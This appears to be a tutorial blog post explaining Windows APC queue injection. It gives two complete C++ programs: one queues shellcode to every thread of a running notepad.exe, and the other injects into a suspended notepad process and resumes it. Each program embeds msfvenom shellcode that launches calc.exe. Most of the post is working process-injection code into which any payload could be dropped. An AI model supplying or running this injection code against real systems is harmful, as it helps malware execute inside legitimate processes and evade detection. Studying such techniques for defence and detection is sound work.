Each thread in a program has its own Asynchronous Procedure Call (APC) queue. This queue contains a list of functions that are executed when the thread enters an alertable state. “Alertable” essentially means the thread is waiting for something to happen and has indicated that queued APCs may run during that wait.
A thread enters an alertable state by calling one of the following functions with the alertable flag set:
- SleepEx
- SignalObjectAndWait
- MsgWaitForMultipleObjectsEx
- WaitForMultipleObjectsEx
- WaitForSingleObjectEx
Adding functions to the queue can be done using QueueUserAPC. By abusing APC Queues, we can execute arbitrary code in the context of a remote process.
Remote Thread Injection
The code below adds APC functions to threads in a foreign process by:
- Getting the process PID using the function GetProcessIdByName()
- Executing EnumerateRemoteThreads() to determine the remote thread IDs
- Allocating memory in the remote process using VirtualAllocEx(), and writing the shellcode to it with WriteProcessMemory()
- Finally, calling QueueUserAPC() for each thread, passing a pointer to the allocated shellcode buffer and a handle to the thread.
The function signature for QueueUserAPC is:
1 2 3 4 5 | DWORD QueueUserAPC( [in] PAPCFUNC pfnAPC, // pointer to our shellcode [in] HANDLE hThread, // target thread handle [in] ULONG_PTR dwData // A value passed to the APC function. We can ignore this. ); |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 | #include <windows.h> #include <iostream> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <tlhelp32.h> #include <tchar.h> #include <vector> DWORD GetProcessIdByName( const TCHAR * processName) { PROCESSENTRY32 processEntry; HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); if (hSnapshot == INVALID_HANDLE_VALUE) { return 0; // Unable to create snapshot } processEntry.dwSize = sizeof (PROCESSENTRY32); if (!Process32First(hSnapshot, &processEntry)) { CloseHandle(hSnapshot); return 0; // Unable to get the first process } do { if (_tcsicmp(processEntry.szExeFile, processName) == 0) { CloseHandle(hSnapshot); return processEntry.th32ProcessID; // Found the process, return its PID } } while (Process32Next(hSnapshot, &processEntry)); CloseHandle(hSnapshot); return 0; // Process not found } // Function to get a list of threads in a remote process std::vector< DWORD > EnumerateRemoteThreads( DWORD processId) { std::vector< DWORD > threadIds; HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0); if (hSnapshot == INVALID_HANDLE_VALUE) { std::cerr << "Failed to create snapshot of threads" << std::endl; return threadIds; } THREADENTRY32 te; te.dwSize = sizeof (THREADENTRY32); if (!Thread32First(hSnapshot, &te)) { std::cerr << "Failed to get the first thread" << std::endl; CloseHandle(hSnapshot); return threadIds; } do { if (te.th32OwnerProcessID == processId) { threadIds.push_back(te.th32ThreadID); } } while (Thread32Next(hSnapshot, &te)); CloseHandle(hSnapshot); return threadIds; } int main( int argc, char * argv[]) { //msfvenom -p windows/x64/exec CMD="calc.exe" EXITFUNC=thread -f 
c unsigned char shellcode[] = "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50" "\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52" "\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a" "\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41" "\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52" "\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48" "\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40" "\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48" "\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41" "\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1" "\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c" "\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01" "\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a" "\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b" "\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b" "\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd" "\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0" "\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff" "\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00" ; const TCHAR * processName = _T( "notepad.exe" ); DWORD process_id = GetProcessIdByName(processName); //Get a handle to our remote process HANDLE process_handle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD (process_id)); // Allocate memory in the remote process LPVOID buffer = VirtualAllocEx(process_handle, NULL, sizeof (shellcode), (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE); // Write our shellcode to the remote process WriteProcessMemory(process_handle, buffer, shellcode, sizeof (shellcode), NULL); std::vector< DWORD > threads = EnumerateRemoteThreads(process_id); // loop over the available threads and inject our APC functions for ( DWORD thread_id : threads) { std::cout << "Injecting into thread ID: " << thread_id << std::endl; HANDLE thread_handle = OpenThread(THREAD_ALL_ACCESS, 
TRUE, thread_id); QueueUserAPC((PAPCFUNC)buffer, thread_handle, 0); } return 0; } |
The above code will work, but will result in the shellcode being executed a large number of times, since the APC is queued to every thread and we have no way of determining when each remote thread will enter an alertable state. We could inject into a smaller number of threads, but then we have no guarantee that the code will trigger in a reasonable timeframe, if at all.
Suspended Thread Execution
To get around the problem of multiple procedures executing at once, we can start a process in a suspended state, queue an APC function to its main thread, and then resume the thread. When the thread resumes, our code should execute once.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 | #include <windows.h> #include <iostream> int main() { //msfvenom -p windows/x64/exec CMD="calc.exe" EXITFUNC=thread -f c unsigned char shellcode[] = "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50" "\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52" "\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a" "\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41" "\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52" "\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48" "\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40" "\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48" "\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41" "\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1" "\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c" "\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01" "\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a" "\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b" "\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b" "\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd" "\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0" "\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff" "\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00" ; LPSTARTUPINFOW startup_info = new STARTUPINFOW(); startup_info->cb = sizeof (STARTUPINFOW); startup_info->dwFlags = STARTF_USESHOWWINDOW; PPROCESS_INFORMATION process_info = new PROCESS_INFORMATION(); wchar_t cmd[] = L"notepad.exe\0" ; // Create suspended notepad process CreateProcess( NULL,cmd,NULL, NULL, FALSE,CREATE_NO_WINDOW | CREATE_SUSPENDED, NULL, NULL, startup_info, process_info); HANDLE process_handle = process_info->hProcess; HANDLE thread_handle = process_info->hThread; // Allocate & write memory LPVOID 
buffer = VirtualAllocEx(process_handle, NULL, sizeof (shellcode), (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE); WriteProcessMemory(process_handle, buffer, shellcode, sizeof (shellcode), NULL); //Execute the APC QueueUserAPC((PAPCFUNC)buffer, thread_handle, 0); //Continue the thread ResumeThread(thread_handle); CloseHandle(thread_handle); CloseHandle(process_handle); } |
In Conclusion
This post covered the basics of using user-mode APCs to execute shellcode. Interestingly, kernel APCs are often used by EDR solutions to inject hooking code into a monitored application.